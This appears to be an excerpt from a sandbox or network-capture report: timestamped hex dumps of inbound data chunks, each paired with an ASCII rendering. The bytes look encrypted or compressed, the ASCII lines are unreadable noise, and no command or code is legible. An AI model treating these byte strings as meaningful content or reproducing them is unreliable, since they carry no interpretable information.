                                                          2022-09-11 08:16:25 UTC159INData Raw: f3 2b f3 1c 19 23 a0 48 23 5e 43 a4 ac 29 a6 38 aa 30 f0 2f 93 c7 95 8c 42 ca 6f ee 64 89 83 66 2b f0 8e 99 be b7 26 19 51 1e df 0c 2d b9 46 e0 08 9d 51 a7 d9 23 d9 2c 9c ca ac bb de a3 67 91 6f 99 67 2b 24 a8 c4 04 8a 44 64 a7 49 10 07 66 5c a9 c8 00 af 0a d7 6a ba 7f 5f 90 e7 da 35 3a c2 27 2f f1 f3 75 c6 02 35 00 6a c6 73 f5 2c 45 88 95 88 a1 cc 1b 24 11 3e 42 b6 6a 39 e8 1e 16 1f 76 7c 7d ee f2 76 a1 c4 29 66 a4 fd 3c b7 67 4a 9b f9 44 d5 aa 94 9e 9b 3b 3f 9f 61 49 b3 9b 5c 64 62 ac 51 2b a6 22 20 11 73 c5 64 6a df 40 a5 52 04 21 90 65 58 55 19 eb 29 eb 5e 83 f3 2b b2 0e d4 3c 4a 3e c4 71 32 64 aa 3d f2 68 a7 92 d8 ef 76 be a0 34 fe 6d c0 0d a7 f2 3c 69 01 5b 5d 20 80 dc 1f 2f 55 df da ed 55 ce 05 dd bd 66 06 96 48 cd 18 73 17 c8 f0 9c 06 ed 24 44 3b
                                                          Data Ascii: +#H#^C)80/Bodf+&Q-FQ#,gog+$DdIf\j_5:'/u5js,E$>Bj9v|}v)f<gJD;?aI\dbQ+" sdj@R!eXU)^+<J>q2d=hv4m<i[] /UUfHs$D;
                                                          2022-09-11 08:16:25 UTC161INData Raw: 21 a8 0e 08 af 02 b7 0a ba 7f 5f c2 3e b3 59 6b e6 94 a7 2f b2 43 1c dd 10 f2 97 2a c9 86 3c d9 3c b1 7e b0 41 f3 5b 3c 99 c3 62 2a 0b 8d a8 71 e5 6a 5d 08 64 af 24 6b 1e d6 d5 a7 b0 84 21 e2 47 e8 87 e0 69 a7 a4 a1 27 20 6d a1 cd 96 f9 35 4f e5 17 fd 83 af 3b 00 a7 02 6f c5 a8 6a f0 d5 1d 39 e6 01 09 2f 13 06 40 90 ca 02 d2 1a b2 f9 e2 b4 3c 2e 70 62 3e 15 61 12 73 8c 0e 01 97 eb 4d 8b c7 00 4f 9f bb 64 b8 48 55 f5 a6 37 1f ba 89 27 ab 76 ba 2e f7 2b 08 80 3e a5 a0 2a b3 7b f5 6f 7a d4 13 e4 2d ef 51 e8 f3 21 0a b4 e8 b0 ae 56 07 32 fe 24 0f 80 22 3a 60 69 5c 98 e8 3e 5e 9d 3c 07 48 cb 72 f4 13 85 16 bb 66 f3 eb bf 35 29 b5 38 51 4f a2 6b 7d fb fb 86 2a cb f3 bd 2f f4 ba e2 19 d7 eb a5 58 1e e6 2b de 1b c5 94 b8 59 64 49 ba 9f 6b e9 ba 02 26 f0 b9 e5 ea
                                                          Data Ascii: !_>Yk/C*<<~A[<b*qj]d$k!Gi' m5O;oj9/@<.pb>asMOdHU7'v.+>*{oz-Q!V2$":`i\>^<Hrf5)8QOk}*/X+YdIk&
                                                          2022-09-11 08:16:25 UTC165INData Raw: 10 29 15 5b 73 8c 5d f6 d4 54 b0 7c 72 b6 f0 69 a1 63 a9 4e 0d 22 ec 51 65 5e e9 88 42 20 cf 21 a7 ec 41 59 fb c2 f2 7f 8a 8d a2 ef 27 89 ac 09 f8 70 05 0b 4c ae 29 2d bd 1b 94 de 8e fb df 06 d4 32 39 26 b6 f9 c4 dc 6c f9 d4 55 d0 4a 7e cd 99 8e a1 28 a7 e0 1a c3 a6 f8 ed 47 24 2e 27 0e b7 06 ea fe 2e b2 72 a0 e1 c9 70 52 2e 65 29 57 5f 82 4b 9b 56 91 2f 33 0d dd 79 0f d7 5a 6a a8 e1 eb 32 36 ea 32 85 b5 31 15 d6 ab da a8 d2 d3 19 47 c5 4d 53 bb 60 5c 92 34 d0 b6 1b 5a a2 0a d2 e7 04 b8 30 bd 4a 22 cd a4 4b 94 1c 6e a1 f9 a2 f7 d9 ae 59 be 3e bd 30 63 e9 d7 82 f5 5d 18 6a 93 1c dd 0e 12 f4 80 bb 27 17 34 84 2a a2 0c f0 f2 43 25 a8 ee 7b cb 0c b2 d3 c0 9b 88 d3 19 89 4a 3d db 43 e2 2b 9c 9b 1b ea d2 29 65 e8 27 52 9f 1f 0d 38 6c 36 04 91 1b d4 e2 ef 2f 6a
                                                          Data Ascii: )[s]T|ricN"Qe^B !AY'pL)-29&lUJ~(G$.'.rpR.e)W_KV/3yZj2621GMS`\4Z0J"KnY>0c]j'4*C%{J=C+)e'R8l6/j
                                                          2022-09-11 08:16:25 UTC166INData Raw: cc 8b 4f 24 02 66 49 2d b0 13 61 30 39 11 97 89 fc 52 cf 0a 37 99 c4 ee 41 08 c5 4d 89 21 8a 7f 35 e4 b3 3a aa 2b a8 49 4f 99 5d df dc 05 81 15 ce 32 ab 1a da 93 ea ec 5d de 26 9a 90 99 12 5b 6e a2 1d c5 9d c8 6c 81 12 d7 40 34 a7 35 a9 42 cb 54 6c 02 72 86 75 e0 9d 21 66 eb 20 84 39 31 4e ae 66 ac 48 d3 7a 77 37 da 11 85 8d bb 24 fb fb f4 8c 94 41 df 32 e1 dc 89 0e 2c e3 fa de c2 e8 61 ce 6e a7 0a ac 5c 2e 9f db fb 4b fb 17 e3 62 c4 f4 70 67 08 af 35 c3 a6 2f 0d cb 2b 1f b3 b5 d3 69 55 8b da 3b 43 d1 3b d2 1f eb cd 58 fd da 9f d8 04 bd e9 da 9b dc 14 2e 17 4d 7e d9 2f 1f 17 4f 03 ee 0a f5 86 a9 9c 9b c5 e0 aa 48 c4 66 06 78 7c ca fe f6 be 2e de be 19 a5 63 cf 91 f5 cb 39 a6 c2 d4 5d 7d b0 74 98 90 6e 2c 74 3e e3 af 2e d6 c0 90 85 cb c9 fc dc c2 d4 1a 1b
                                                          Data Ascii: O$fI-a09R7AM!5:+IO]2]&[nl@45BTlru!f 91NfHzw7$A2,an\.Kbpg5/+iU;C;X.M~/OHfx|.c9]}tn,t>.
                                                          2022-09-11 08:16:25 UTC170INData Raw: a0 01 4e fc b2 5c 9f 35 1f 4a a9 2c 44 11 8c b1 8e ab a4 69 e1 69 1e 15 66 57 d8 f6 2d f7 6b d1 db fb ba c7 87 fa b1 3d 1f 26 02 6c 2b 21 61 6c 64 ad 20 2e 70 f9 cc 83 e7 2b b3 0b 62 8c 19 0e ea ae fd 79 b5 6f be 50 5d 99 9b 2f 2f 86 dd 7c 26 12 96 39 38 7e c3 10 a9 59 54 ea 17 95 69 2a 96 7b 86 ca c7 77 39 11 1f 70 c2 91 7f b7 27 37 7e 19 25 3e 06 15 1b 22 a5 7a 34 67 20 62 2b 2f 12 11 21 b4 19 9d b8 21 ba d4 7f 9b 70 39 64 84 44 ea ba ff ec 5d 5d 79 f9 a5 2b 77 b1 f8 35 44 fa e9 a8 dd e8 fe ca 9d a7 f0 34 69 66 c1 4c 71 3e 69 e6 77 fb 6a 01 da 21 f3 a1 f5 3e e3 2f f2 6e 30 91 5d e7 01 e7 0c c3 3a 86 76 b2 7a 4f fa 77 3c a6 16 41 eb 43 6a 4f 6d 81 5c a7 1e d4 1a a4 ec 4a 0a b4 7c ad b5 37 9f 92 1e d4 e6 5b 51 6e 19 24 1f e4 43 c9 86 d7 3d 97 6a 58 33 7d
                                                          Data Ascii: N\5J,DiifW-k=&l+!ald .p+byoP]//|&98~YTi*{w9p'7~%>"z4g b+/!!p9dD]]y+w5D4ifLq>iwj!>/n0]:vzOw<ACjOm\J|7[Qn$C=jX3}
                                                          2022-09-11 08:16:25 UTC172INData Raw: 55 36 61 68 04 ab a6 99 61 d8 36 58 45 fb 1f 1b b4 5e 19 63 56 c3 9e 4b 29 aa 62 a5 40 47 a1 a6 55 25 15 50 ee 0d 21 ec 31 d1 46 48 aa 94 a9 5f 9f 02 f5 45 cb 16 ea 17 da 5f e8 00 a7 6c a6 6d fd 44 ab bd 4d 27 5f f6 10 41 0a 12 fc 4c f8 d5 a3 96 96 12 cd af 02 3d 4b 61 c5 eb 2c 27 ec 82 2e 9f 78 9e ab c0 f0 9b 07 51 12 9d 8c 62 38 d5 f1 95 e4 83 9e 9a 22 9f d0 5d bd 33 d3 d3 13 62 af 37 fa cf ca cf 16 61 2d 3b 40 ab f6 97 aa dd 63 ea 1f 2d f5 36 3a 72 fc 33 85 44 8e 01 e9 cc ad b3 7f bc f6 5d 45 b3 d1 70 40 a4 f2 2c a6 b0 2a 7e b2 e0 de 13 d5 a8 6f 99 d0 35 64 82 29 ae ee e1 2c 27 fe 29 a6 c3 4d 37 a9 2c a3 7e 48 c0 e6 fd e0 a6 ef af e2 d4 db e3 d2 24 15 6b c4 fa 6c a2 22 fc b7 99 74 92 5c a9 8c aa 28 3f 57 b4 83 ba d6 e0 a5 e5 78 39 2c ac fc 82 fc 46 6b
                                                          Data Ascii: U6aha6XE^cVK)b@GU%P!1FH_E_lmDM'_AL=Ka,'.xQb8"]3b7a-;@c-6:r3D]Ep@,*~o5d),')M7,~H$kl"t\(?Wx9,Fk
                                                          2022-09-11 08:16:25 UTC176INData Raw: 95 58 65 15 1e e7 66 8a c2 5f 6d a7 62 80 33 ab 63 2a 6b d7 6e d0 28 0d 83 96 90 6e 00 ed 12 d4 80 eb f3 88 d9 16 d6 92 da f7 b3 bb 5f 07 7e b3 65 3f 3d e4 13 2e 91 aa e5 16 d3 89 87 66 46 fe 17 2b 2e 67 1e d7 de 16 80 4e 5a 55 aa 23 27 61 e0 ce 86 a7 6a 87 ce e3 a5 2d 0b 43 64 c3 72 d5 33 c5 80 04 10 24 30 ff 61 a8 e6 de 99 ee 21 ab 43 0b 1a 97 a9 de 6f 57 e1 b0 f9 99 df 2c 98 d8 6a 1a a4 a6 6a d3 e5 36 4b 13 7c 9a b3 d8 eb 1a d3 26 6e 8e ce ad 5b 5e da b2 4d dc a2 27 1d 28 d8 9e e2 d0 95 2a a1 1e ae 5f da d1 e4 68 6f 1a 96 aa a7 44 f4 1b c0 2f 40 ac c1 85 6c 2b f1 ee 5e cb 6c 08 d8 37 5f 41 51 c4 e3 98 5c 54 80 3e e2 c3 e4 4a 6d ea ad 92 53 2b 62 c0 44 a1 20 dc ed a0 e1 db ea a4 7c 16 46 de f8 d9 74 ae 83 c8 e5 91 56 66 40 cf 36 7c 10 58 1e df ed e3 96
                                                          Data Ascii: Xef_mb3c*kn(n_~e?=.fF+.gNZU#'aj-Cdr3$0a!CoW,jj6K|&n[^M'(*_hoD/@l+^l7_AQ\T>JmS+bD |FtVf@6|X
                                                          2022-09-11 08:16:25 UTC178INData Raw: 4a c2 4c 22 bd 51 18 c7 1c e1 85 ea 42 91 6c 80 16 d4 96 bb 44 af 62 90 3f 0f 1e 96 da 66 bf f4 a5 6c 25 ca 12 3e 6d 13 6e b3 4f e0 52 ff c2 19 5e e1 41 fe 52 20 af 02 0d a2 ac 03 07 57 6a 26 d3 d2 5e 68 52 45 3e 6d 30 9e c3 6d b0 20 fd 6d bf 78 a4 63 ab 66 60 ca c9 63 1e d4 a0 9c 69 ed fe 89 a0 68 80 09 ea 63 e0 45 c8 6d a7 d6 a6 de ae d5 4e 44 78 e9 43 aa 03 b3 ef 0f d6 0c fc c0 43 1f d3 96 3c 39 c7 ca 7d 2b 7e 7b 54 99 4e 3e 2c 83 0a aa 2c 53 96 16 a9 dd d0 48 40 d8 60 90 2e de 60 eb 37 e8 47 de 56 2c 57 fb 25 d8 1a 42 e4 1f 36 ea 71 4e 47 21 fc 32 5e d9 5a 47 71 87 5a 6e b6 e8 e6 15 4b 3d a0 1c ac 9d 4e 83 f7 f6 8f a4 07 db 1e 42 85 b9 30 94 be e8 35 52 aa d8 b0 d2 9e 8b 35 a4 6a 5b 7e 70 80 6e a8 99 df 2a a3 aa 28 ef 2d bb f7 6f 2c ef 1d e6 6e 1f 76
                                                          Data Ascii: JL"QBlDb?fl%>mnOR^AR Wj&^hRE>m0m mxcf`cihcEmNDxCC<9}+~{TN>,,SH@`.`7GV,W%B6qNG!2^ZGqZnK=NB05R5j[~pn*(-o,nv
                                                          2022-09-11 08:16:25 UTC182INData Raw: 98 59 6b db 21 90 cb 72 04 42 37 39 22 d3 c0 79 0d 1d 3c f0 b6 51 1f f8 d5 62 94 75 6b c1 8f dc 6d 2d 1b 90 af 51 81 02 85 86 9c d4 7f 34 69 d8 94 d3 16 58 1c af e2 cb 06 a6 1e d9 e2 db 97 d0 03 bb 9c 11 72 fe 1f c5 16 cf 68 4f 7c 8b 47 a7 ff cc e0 24 92 bf 77 52 7a ee 6a c5 97 41 3e 1b f5 18 6b 4f 60 fc c5 58 7f 1a 81 e0 7e 32 2f 12 0f 01 23 4d e3 3b 63 25 11 00 39 4b bc 98 72 35 2e eb 0e 7f 55 66 52 58 07 1b 8d 1c ed a9 e5 2b 0a 00 e8 f2 53 8f ef a2 1c 25 12 fd d4 37 08 bc 14 d8 a2 90 7e 4e 5b 54 f5 a6 35 a2 f5 b7 a4 ea 51 5d 2a 26 53 96 6c 28 ab eb 6c a0 6e ad e2 6c 76 e3 85 5a 64 bf 7c a0 77 bd 6d be 37 66 e8 26 29 6b e1 28 66 be f4 24 86 47 bb 07 eb 80 53 c6 e9 9a 8f 0e 1e b2 7b a9 e9 29 eb 24 09 a2 87 69 d3 68 90 6e e1 fd ec 4f d5 a7 62 af 6a 0f fd
                                                          Data Ascii: Yk!rB79"y<Qbukm-Q4iXrhO|G$wRzjA>kO`X~2/#M;c%9Kr5.UfRX+S%7~N[T5Q]*&Sl(lnlvZd|wm7f&)k(f$GS{)$ihnObj
                                                          2022-09-11 08:16:25 UTC183INData Raw: e8 25 62 65 22 e2 45 22 1f aa 93 5e 93 84 69 a7 c1 14 5e 4c e9 cd 59 7a b3 6f 37 e1 8c 46 43 4b 4d 77 d0 d1 44 87 7d 47 a7 a9 23 4c 5f b3 25 83 8c e1 34 0c 78 e8 5a ac d1 66 06 9c 95 2b 4b 63 c6 2b 93 16 4b 90 dd 42 fb 7a 7b b3 9c 34 e4 8a bd 7a 4b de 33 66 2a eb 49 86 a4 6f 78 75 c7 84 ed 90 18 5e f3 a5 4b 96 38 0b 2b 0a 49 68 46 89 d5 11 76 9c aa 7a 90 49 03 57 db 90 9c 15 6c db a3 61 cf c1 1c 13 77 9c be 9e 66 b8 5f 4b ed e3 1a 16 72 b2 e4 dc 57 b4 47 9d de f0 9c 40 5b b2 48 a5 39 ee 5e 57 57 eb 0f b2 9e 43 d6 d5 40 4e 87 3f f6 70 ef 51 53 af c4 88 c7 31 8c f9 ee df be fc 10 2b 78 df 5b de 85 af cd 72 7b 73 d5 de 32 7d 54 75 7e 0f 87 2f 11 d9 2c a3 65 ee 86 4f a7 9a 28 28 db 2b 87 3e d0 b4 78 ab 74 7b 25 05 49 62 6d da 28 ea 51 a7 c7 48 a0 8b 47 e1 26
                                                          Data Ascii: %be"E"^i^LYzo7FCKMwD}G#L_%4xZf+Kc+KBz{4zK3f*Ioxu^K8+IhFvzIWlawf_KrWG@[H9^WWC@N?pQS1+x[r{s2}Tu~/,eO((+>xt{%Ibm(QHG&
                                                          2022-09-11 08:16:25 UTC187INData Raw: 22 d3 0f 8d 10 a5 3c 3f ed 79 fe 68 ef 53 13 8d 44 5b 54 a5 ab 78 4f 83 0e 9e b0 90 32 66 96 16 d5 68 51 b0 0e fa 85 99 e6 d2 ce 18 c0 1f aa 5b 11 db bc 5a e1 35 ba 1f ee 22 88 48 39 73 72 a9 a7 00 57 0c 8f c2 08 00 fa 32 cb 66 07 da ed 2c dd 00 b3 13 cc fb ef 39 2d 60 32 7f 2d b6 10 1b a4 b8 9d c6 50 da ac b1 d2 4f 05 44 7b b8 ad b3 9f 52 3c fb 0e 05 73 d3 ca 84 df 90 cb 63 e4 2d b5 38 eb 00 cc 7b db 07 b5 15 ca 7f ff 4c d8 2d c2 c1 26 70 1c d4 8a 73 56 21 37 62 3f fa ab 42 9d ff e6 30 bc 32 ff 38 ee f9 62 f2 5f d2 b8 f9 3f 31 7b ab cf 46 84 89 6f e9 c5 84 ab a8 7d b8 65 d1 d6 f2 17 19 1d 38 83 3d a1 38 f3 25 6d be f6 6a a5 3a e8 89 6d df 3f 72 26 eb ad 70 3e 8f ef 5e 3a d7 97 fe 18 a1 40 70 46 b7 3e 36 13 9a 1b 4e 60 e0 2a 32 90 c9 8a 33 b0 b0 6f 2e c2
                                                          Data Ascii: "<?yhSD[TxO2fhQ[Z5"H9srW2f,9-`2-POD{R<sc-8{L-&psV!7b?B028b_?1{Fo}e8=8%mj:m?r&p>^:@pF>6N`*23o.
                                                          2022-09-11 08:16:25 UTC189INData Raw: a5 3a 87 8b ec a0 6f 63 a2 ba f2 67 21 ac fa fa a1 ec 4f cb 23 59 a6 c3 a6 c2 18 fa 28 6b 72 3c 27 f7 63 3b d2 c1 c7 00 df 93 27 d3 eb 1a e6 97 1c 68 db 47 1e a5 c0 22 f2 37 fe 68 35 61 69 66 cd 08 af 02 1f a0 b8 7f 5f 5a 38 2e 26 ae e1 39 8f 90 1e 31 b7 74 ca 8a 32 6c 57 91 cf 79 d1 1f ca 86 5e 06 93 4f 31 e0 ea 4a c1 78 a5 49 87 69 ac 63 a5 4a 84 6b a6 1e 80 b3 64 3e 3e 26 6e 1e 98 aa 7d 3f 26 3d 01 5e c0 ce 41 f3 5b 38 75 cd 68 aa 06 eb af ea 59 e8 7b 68 7a 7e 4c 44 ba 99 5f 17 ee 69 3d ff 67 69 ef 84 2a 6a cf 1c 51 94 a6 63 50 7b c3 06 34 f1 f7 32 34 e9 cf 0d af ee 2d 6b f6 b0 5c 12 24 2f 81 cb 8f eb 48 9a 8e 54 d8 3d 67 8b 64 1e f0 8b 6d cb dd 73 96 f0 1a 6b 68 9d 66 d4 e6 d3 b0 dd 00 ef 61 7e b7 e9 45 0f 23 65 ab 88 ce 42 87 ad 21 2f 63 4a 45 af 61
                                                          Data Ascii: :ocg!O#Y(kr<'c;'hG"7h5aif_Z8.&91t2lWy^O1JxIicJkd>>&n}?&=^A[8uhY{hz~LD_i=gi*jQcP{424-k\$/HT=gdmskhfa~E#eB!/cJEa
                                                          2022-09-11 08:16:25 UTC193INData Raw: de bf 1a 63 93 5a 51 ba 71 9c 91 5a 7d e5 c2 5a 6b 96 97 d2 2f 5a 0d f0 97 fc 64 0f 97 e8 15 5a d5 28 97 0c f1 5a f1 69 c2 5a ed 10 97 56 ab 5a 97 6a 97 52 c9 1f 34 c5 c8 1a b1 4c 97 6a 97 5a 41 dc d2 4a a2 ba 47 5a 65 98 97 de 46 0f 97 c2 3f 5a 31 cc 97 e8 15 5a d1 49 c2 5a cd 30 97 30 cd 5a ef 12 97 5a 02 cf 97 4e b3 5a b7 4a 97 90 79 be 45 2d c2 5a 7d 80 97 a4 59 5a 19 e4 97 c2 5a 0f 97 f2 0f 5a 2b d6 97 ea 17 5a d7 4f c2 5a cf 32 97 26 db 5a 93 6e 97 76 ee 0f 97 6e 93 5a 53 ae 9f 80 75 5a 75 ed c2 5a 0d f0 97 f0 0d 5a 2b d6 97 10 88 0f 97 04 f9 5a f9 04 97 24 d9 5a 47 21 7c 03 8f 75 93 c0 39 6a b9 5a ad 50 97 cb f7 9b a1 6c a7 ea 56 1b d7 ea 57 e8 ad d6 92 77 8e 5a a2 90 ad a1 9a 66 dd 1a 16 da e2 10 9c 6f 9d 11 d6 5a 4d b6 94 6f 7d 80 97 a2 ec d9 97
                                                          Data Ascii: cZQqZ}Zk/ZdZ(ZiZVZjR4LjZAJGZeF?Z1ZIZ00ZZNZJyE-Z}YZZZ+ZOZ2&ZnvnZSuZuZZ+Z$ZG!|u9jZPlVWwZfoZMo}
                                                          2022-09-11 08:16:25 UTC194INData Raw: 0b 89 ee 74 4b 98 d9 10 a3 7c e4 3f a1 6c b2 7f b7 72 ad 69 b5 7e 0a eb 8c 61 d9 1f a4 5c 92 75 72 a0 98 ff 00 67 ac 04 c2 69 81 4f a8 cf 0d 6d 0a c5 a2 69 21 ef a4 2c e2 65 42 80 98 7f 85 62 ac 3c fa 69 b9 77 a8 ff 3d c2 1b 79 f3 39 ac 1c da 69 99 57 a8 cf d7 b0 68 b2 b0 61 c1 07 a4 44 8a 65 fe 86 1d 6d a1 24 65 e7 a0 20 ea 65 52 3d 0a 55 9b 69 ac 60 95 4a 34 95 1b 29 78 9f 2e c9 20 1e 54 eb 95 d9 28 a3 e1 d5 02 fb 2c ef c1 89 26 eb 2c 68 08 4c 24 3c 73 fc 33 69 24 2a 64 e5 4e 0c 38 72 75 3f 22 34 7c eb bd f1 20 fb b1 d5 18 e1 e0 2e d4 91 20 ed a4 e0 78 3c 18 46 79 27 22 04 4c eb 26 81 c5 d5 91 e9 25 cc ea 8b ac e9 ef a1 30 8b d1 f5 39 8c 97 ac b6 ed b7 7d e7 2a c2 1c b3 ed 1c 05 fb 15 50 ed 97 dd 28 ab e9 d5 97 b0 f2 ef c5 8d 26 4c 00 ed 0e 44 24 e8 11
                                                          Data Ascii: tK|?lri~a\urgiOmi!,eBb<iw=y9iWhaDem$e eR=Ui`J4)x. T(,&,hL$<s3i$*dN8ru?"4| . x<Fy'"L&%09}*P(&LD$
                                                          2022-09-11 08:16:25 UTC198INData Raw: 15 00 03 14 20 5d ab d7 6c f4 35 ba 4c a9 9d 79 14 4e 65 3d 21 13 cd fe a5 80 94 b4 97 dd 3c 77 cf 3a c4 33 fa 67 6c f0 c6 1d 77 a7 fa 40 df 64 a2 a7 27 20 97 fa 8f e3 13 69 d6 a9 21 34 7e 6a 79 d3 86 2e 4c 8e 2e ed e0 81 bb f5 f8 dc 13 36 a0 3b eb 72 95 66 43 b1 11 f5 1a fb 23 a8 b2 38 7b 4f 4a 7c 4e 12 e2 bf 72 68 f9 e8 4e 35 51 2b 16 d2 a9 6f 23 8f 01 ac a7 1c 58 e6 95 41 f0 25 cd a6 08 61 f8 fb a0 a2 b4 52 3e cf 94 0f 96 0c cc e8 6e 48 f9 b5 c6 8b 7d 26 9f c1 4f 7b 37 02 17 9c cf 46 22 c1 67 85 1e bb 7c d2 22 e6 d4 11 7a 01 2c 55 4f 5c 84 96 cb cf dd dc f9 92 75 1f a1 75 8d 5b 94 28 25 98 78 f1 89 be f1 ac 21 7d a9 4b d9 39 9c 16 71 fa 18 85 28 b0 2a d8 80 73 72 3f 78 37 47 62 d0 f4 7b 18 cb a3 47 45 63 60 1f a2 9b 24 2a ff 33 e7 ae 6c 6a ad 9c 31 c2
                                                          Data Ascii: ]l5LyNe=!<w:3glw@d' i!4~jy.L.6;rfC#8{OJ|NrhN5Q+o#XA%aR>nH}&O{7F"g|"z,UO\uu[(%x!}K9q(*sr?x7Gb{GEc`$*3lj1
                                                          2022-09-11 08:16:25 UTC200INData Raw: 01 ce 17 ca 76 cc cc ce 77 4d 23 84 8f 4f f8 80 d9 0e e2 27 ae 0c 39 23 e1 13 99 c3 2c 11 42 c7 7a 50 58 60 0d 52 83 64 0c d3 6c 2e f4 d1 b7 2a a2 90 ad 8d d5 92 76 89 3b d4 05 b2 06 d6 de b6 50 97 c4 11 27 95 1f 15 26 14 f0 5f de 16 2b 5b 88 57 31 fc ff 55 ea f8 8e db d7 8a e3 d9 0c 8e b5 98 16 29 c2 9a cd 2d c3 1b 22 67 3b 19 f9 63 6d 58 e3 c4 1a 5a 38 c0 f4 1c 4b fb c9 1e 90 ff 9f 5f 8a 58 e8 5d 51 5c e9 dc be 16 11 de 65 12 47 9f 7f b5 30 9d a4 b1 79 6a a7 6a d0 1a 90 cc df 8a c8 27 12 fa ff 81 1a 00 0e b7 ce 70 39 11 c1 e0 61 fa 0c 90 56 5c 0a bf f4 d0 ec cf c3 76 e3 5f 9b 9d 2e 2f ac 3b 26 d5 5d 0d f2 a5 6a ab fd 35 32 40 30 45 05 e6 2b c0 00 1e a9 b0 37 b8 a6 20 6f 53 6b 50 58 f5 63 aa a9 c3 b7 da 9e 65 b8 4a c6 8e 75 3a f1 28 73 15 53 a4 95 65 64
                                                          Data Ascii: vwM#O'9#,BzPX`Rdl.*v;P'&_+[W1U)-"g;cmXZ8K_X]Q\eG0yjj'p9aV\v_./;&]j52@0E+7 oSkPXceJu:(sSed
                                                          2022-09-11 08:16:25 UTC204INData Raw: e0 00 57 2a aa ef d6 9a 16 63 f9 19 91 c4 e3 58 dc 71 0d f5 97 37 36 86 d1 22 5c ff 90 1e 63 58 8a 5f 64 3b 91 9c 90 00 db 73 11 75 d3 12 65 de bb b5 7f 9f 33 b4 7c 69 50 eb a4 1d b3 f8 a5 da 97 e2 f7 b6 b3 f6 5b 1a 0d 58 0f 5a 0f f2 97 de 23 5a 6f 92 97 6c 79 82 97 db 17 05 ac 6a a6 2e 87 0e aa 60 b0 77 a1 6b a8 0b d5 61 de 19 a0 6c b0 6e c6 07 ea 2f ac 60 c3 6a c1 0c ce 6f ae 2f e2 7d a7 77 cf bd f3 9b d3 b8 74 6a a7 0e a2 7f d1 09 73 de cf 6d ba 6c b4 6a c1 03 ad 60 ab 61 bd 3e ea 2f ea 62 a5 75 d3 0c d5 7b c3 7d d4 7e b0 68 a7 03 a0 67 ab 68 ea 3a b6 7f ba 61 f5 5f d4 79 ce 14 a6 e9 51 5d dc 00 ee 6d af 0c cb 67 b2 7b e2 7b b8 76 95 44 b8 6a b6 09 8b 75 ae 13 d5 71 a9 65 bb 3e b6 62 9e 53 ab 72 b8 68 a6 6c b0 4a ea 46 b4 73 ec 0b 82 62 ca 9b 53 6e a4
                                                          Data Ascii: W*cXq76"\cX_d;sue3|iP[XZ#Zolyj.`wkaln/`jo/}wtjsmlj`a>/bu{}~hgh:a_yQ]mg{{vDjuqe>bSrhlJFsbSn
                                                          2022-09-11 08:16:25 UTC220INData Raw: f8 49 c5 90 5d 1e 53 09 84 f2 e4 f7 02 33 83 f7 10 01 bb 1d d3 82 49 1e d5 1e ce 65 b4 19 17 db 76 d0 cc 5a 89 85 5d 09 9a cd 50 07 5f f4 84 77 b9 29 fa 58 cc d8 ac 36 5a 1f c7 bc 15 9b 47 12 bc 07 8b df 16 2e de d3 14 3b f6 6a 17 b5 79 d4 c2 00 11 ac 27 98 d6 bd 64 ff 44 c8 b4 a1 be 3d 3d e6 0d 00 5c d7 86 2d 74 1b 74 39 f0 a7 7e cb de 6b be 10 c4 f3 13 40 5b e4 e8 03 eb f3 3a 1f ce 74 5c b2 f6 6a 97 71 bd f2 fd b3 67 ed 1a 8c bc 57 b6 00 fc 58 16 47 6a 3c 5d c6 95 5a f6 9b 54 59 99 10 d3 9a 5a 77 89 24 d7 16 6b db ca 17 b0 dc 16 1b cb 66 18 75 8c 92 38 47 0b 78 7b f0 3c 4d 00 42 0f d9 f6 3b 96 59 1a a4 ee 67 90 19 d2 9d 64 e9 be 73 12 1c c7 55 66 a9 da 2b 47 83 0c 4e 52 3a 9b d7 14 3b f6 17 ad bf 67 da 73 9b 50 b9 5b b2 50 f9 1f 41 0c 31 54 d8 04 0a 07
                                                          Data Ascii: I]S3IevZ]P_w)X6ZG.;jy'dD==\-tt9~k@[:t\jqgWXGj<]ZTYZw$kfu8Gx{<MB;YgdsUf+GNR:;gsP[PA1T
                                                          2022-09-11 08:16:25 UTC227INData Raw: 68 22 be fe 62 3a 33 ae bb 72 a5 46 4a a0 fb 6a 33 af cf cd 65 39 3c af d3 d0 69 27 db 9d 76 0d 13 ae af 66 a0 ae 6a 2d ad 84 cb a2 2e 21 65 a1 6b e0 e9 a4 f3 f8 6b 2e 65 22 63 66 69 a2 f9 62 3e a5 39 4f d9 a8 f6 33 ac f4 f8 a5 61 bb 2c 38 69 34 a9 fc 76 e5 f0 a5 61 a1 0e 0a 63 aa 69 d3 f4 ae f1 f9 62 4e a7 0e 39 b8 8b 6e 6b c6 e9 6a 6b 89 82 3c 14 ca c8 54 9b 63 a2 3e f3 6b c2 0c 01 bd ac 51 e1 6f 23 0e 45 68 27 a6 aa cf 41 12 a7 6a b9 6c 05 80 8d 62 2b e1 ad 8c 68 34 a1 7d e0 1a ba 62 84 07 20 88 cf 32 9f 07 24 93 bb 01 f1 dd 40 fe 57 08 c7 16 d8 0c f4 13 69 8d 3b 13 42 ee 0f 6c 8b 67 8c 36 1e ca d4 e4 20 74 a2 2a 86 4e 01 b2 1e da f4 09 79 aa be 6f b3 7e a6 de 76 30 aa 38 c4 98 37 08 4d c2 d3 3f c4 a8 5f 71 81 6f bf 69 dc 14 da 0e a2 5e f0 09 a5 2a e2
                                                          Data Ascii: h"b:3rFJj3e9<i'vfj-.!ekk.e"cfib>9O3a,8i4vacibN9nkjk<Tc>kQo#Eh'Ajlb+h4}b 2$@Wi;Blg6 t*Nyo~v087M?_qoi^*
                                                          2022-09-11 08:16:25 UTC231INData Raw: b4 71 af 69 cf 0c cb 02 0a ae c2 4d 91 6d a7 19 a6 3e a7 56 bd 7d a3 6f 8a 63 83 0e a7 e2 2f 29 e4 7e c7 1f a4 ec 62 2b 43 8a f5 59 b0 18 f4 5c b6 5d 8b 6b ad 67 ce 1e ba 6c a6 49 8b 78 bf 05 a3 ab 6e 10 85 48 ba 66 a1 1b c0 6a d4 50 85 75 df 5d 8e 65 cb 0c c2 09 c5 1f d2 29 8b 75 d5 11 df e5 7e 3d e3 2b ce 75 d4 1e a1 7b a9 77 be 42 e6 c8 ed 83 f1 54 a8 75 de 37 89 19 f2 6f be 4d af 63 c8 c1 49 29 80 1c f0 6a 89 41 f5 4f bc 77 b6 0e a2 30 b4 42 af 68 ba 61 de 6a a7 80 49 38 98 71 a1 6b d2 0b aa 47 8a 6a a4 66 81 7f 8f 12 a7 c3 0a c1 5a b8 37 0e f1 2d 41 8a c4 6a 4a 02 31 3f 93 1c c6 6a c2 79 c1 1c eb 55 b2 57 91 41 94 1c d2 9f 14 b9 